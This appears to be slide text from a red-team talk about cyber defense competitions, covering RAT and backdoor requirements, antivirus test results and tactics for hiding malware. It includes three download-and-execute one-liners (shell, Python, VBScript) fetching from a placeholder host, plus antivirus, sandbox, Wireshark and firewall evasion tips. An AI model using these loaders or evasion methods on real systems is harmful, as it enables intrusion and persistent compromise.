23. Requirements
Full-featured RAT
File access
Interactive shell
Screenshots, keylogger
May include stealth features
Basic backdoors
Used for re-establishing full-featured RAT
Simple command and/or shellcode execution
Callback or listening
Keylogger/persistent monitoring
File packing tools
Worms – every method possible
24. Compatibility is hard
Windows XP – Win 8.1
Hook-based keylogging fails…
*NIX’s
Make Windows look great
No two Linux distros startup the same
OS X(!)
NetBSD
OpenBSD
FreeBSD
X64/x86
OpenIndiana (Solaris)
Ubuntu
Fedora
Linux Mint
26. On-the-fly backdoors
Usually you are caught off-guard with at least one system
Webshell collections are your friend
Scripting skills are a must
while[ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done
eval(urllib2.urlopen('http://a.bc/def').read())
echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open
"GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs
27. First world red team problems:
I accidentally six or seven keylogger copies
31. AV test lab
Top market share AV’s (Internet Security Suite version) on default settings
7 “fresh” tests (results BEFORE I knew what any of the AV’s would detect)
33. Test 1: Widely known malware
with 1 byte appended
The only way to fail is by using giant hash lists instead of real signatures
FAIL
WIN
FAIL
WINFAIL
FAILFAILFAIL
WIN WIN WIN
WIN
34. Test 2: Malware with public code
samples
FAIL FAIL
FAIL
FAILFAILFAIL
FAIL FAIL FAIL FAIL FAIL
FAIL
35. Test 3: One-off malware with no
evasions
FAIL FAIL
FAIL
FAIL
FAIL FAIL INDECISIVE
FAIL
WINWIN
WININDECISIVE
37. Test 5: “The Kraken” – Sneaky firewall-
evading malware
FAIL FAIL
FAIL
FAILFAILFAIL
FAIL FAIL FAIL FAIL
FAIL
WIN
38. Test 6: Worm with no evasions
FAIL FAIL
FAIL FAIL FAIL
FAIL
WIN WINFAIL
Hosed VMFAILFAIL
39. Test 7: Legit program used maliciously
FAIL FAIL
FAIL
FAILFAIL
FAIL FAIL FAIL FAIL FAIL
FAILINDECISIVE
40. Notes
Symantec was only AV to detect reverse meterpreter on the wire
Kaspersky’s behavioral emulation detected one worm well
Kaspersky and Comodo both recognized at least one piece of malware as
unusual, (not on whitelist) but not necessarily bad
Trend Micro was only AV to block hash dumping
Panda, Avast gave errors installing and were not tested
42. Just kidding. After 2 hours obfuscating,
these are the real final standings:
FAIL FAIL
FAIL
FAILFAILFAIL
FAIL FAIL FAIL FAIL FAIL
FAIL
43. How do I bypass AV?
Write your own stuff
Dynamically resolve API calls
Obfuscate strings
Introduce environmental/system dependencies to generically thwart
sandboxing
Write your own stuff
Impersonate legitimate software
Watch what hits disk
Digitally sign your stuff if you can
Write your own stuff
44. Security Software Lessons
Some AV’s are a total fail
MalwareBytes Pro is in this list with MS, McAfee, F-Secure
Many have one really cool feature or heuristic
Kaspersky, Symantec, Trend Micro
All can be bypassed easily for most malware
Only detection remaining after 2 hours was one worm vs Kaspersky
46. Hiding from the students
Host hiding
Hide while running
Hide start
Meterpreter is great for functionality, bad for persistence
Mostly custom malware
Mostly standard persistence methods
Don’t run in your own process
Don’t use any of those toy languages with dependencies
Use C!
49. Hiding on the wires
Hiding from Wireshark
Harder than hiding on host
Try to blend in with normal traffic
Throw Wireshark crashers
Remove packets from view
Hiding from netstat/tcpview
Using HTTP(S) instead of TCP callbacks doesn’t leave connection open
If that fails, blend in by using common ports and cloud IP’s
Migrate session to web browser or critical process
50. Hiding on the wires
Use every protocol that gets out
TCP
UDP
HTTPS
DNS
Use hop points in cloud/web hosting
Use file sharing/paste/social media sites
Random callback selection and delays to avoid monitors
Any way students can send or receive info, you can too
51. Dealing with firewalls
Two types
Host
Network
Host firewalls
Usually don’t stop outbound traffic
Can go underneath, watch raw packets
Frequently add exceptions or drop the firewall
52. Network firewalls
Great to own
Tough if you don’t
Use service ports since
they must be able to
reach the hosts
53. Defenses that hurt
Patch or block RCE’s
Strict inbound and outbound network firewall rules
Traffic monitoring
Different passwords on all the boxes
Pull the plug
Reverting (sometimes)
Realizing that sometimes, the red team can’t hurt you as much as finishing
injects helps you